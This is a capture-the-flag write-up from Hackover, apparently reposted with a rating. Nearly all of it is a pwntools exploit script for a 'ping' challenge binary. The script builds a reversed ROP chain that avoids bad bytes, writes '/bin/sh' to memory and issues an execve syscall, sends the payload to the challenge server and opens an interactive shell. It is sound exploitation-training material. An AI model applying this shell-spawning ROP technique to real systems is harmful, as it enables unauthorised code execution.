Rating: 4.5

from pwn import *

# the binary reverses our payload and checks for a number of bad bytes
# generated a ropchain and modified it to work

def ropchain():
# modified ropchain generated with ropper
# ropper's badbytes option didnt work correctly...

from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # ping
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

# the pop eax instruction is bad, so replaced it with pop ecx; mov eax, ecx; pop; pop; ret
rop += p32(0x080e05f5) # pop ecx ; ret
rop += '//bi'
rop += p32(0x0806cfe5) # mov eax, ecx ; pop esi; pop edi ; ret
rop += p32(0xdeadbeef)*2

rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4004)
rop += rebase_0(0x0000d96b) # mov dword ptr [edx], eax; ret;

rop += p32(0x080e05f5) # pop ecx ; ret
rop += 'n/sh'
rop += p32(0x0806cfe5) # mov eax, ecx ; pop esi; pop edi; ret
rop += p32(0xdeadbeef)*2

rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4008)
rop += rebase_0(0x0000d96b) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00001573) # xor eax, eax; ret;
rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4010)
rop += p32(0x080e13fe)*4 # decrease edx to 0c again
rop += rebase_0(0x0000d96b) # mov dword ptr [edx], eax; ret;
rop += rebase_0(0x0000783c) # pop ebx; ret;
rop += rebase_0(0x000a4004)
rop += rebase_0(0x000985f5) # pop ecx; ret;
rop += rebase_0(0x000a4010)
rop += p32(0x080e215d)*4 # decrease ecx to 0c again
rop += rebase_0(0x00027e6a) # pop edx; ret;
rop += rebase_0(0x000a4010)
rop += p32(0x080e13fe)*4 # decrease edx to 0c again
rop += rebase_0(0x00001573) # xor eax, eax; ret;
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x00015633) # inc eax; pop edi; ret;
rop += p(0xdeadbeef)
rop += rebase_0(0x000259c5) # cd80;
return rop

#r = process("./ping", shell=True)
r = remote("challenges.hackover.h4q.it", 1337)

rop = ropchain()
revchain = rop.ljust(446, "A")[::-1]

"""
(gdb) x/8x 0x080bcec8
0x80bcec8: 0xba 0xc4 0x07 0x1c 0xd1 0xac 0x83 0x03

badbytes = bac4071cd1ac830300
badbytes += 0a0d200b0c09 (isspace bytes for scanf)
"""

# check for badbytes
assert not any(c in unhex("bac4071cd1ac8303000a0d200b0c09") for c in revchain)

r.sendline(revchain + "A"*24 + p32(0x1337CAFE)[::-1] + "C"*1000)

r.interactive()

Original writeup (https://gist.github.com/c3c/d92df0137b378c03b56cb57370a6c868).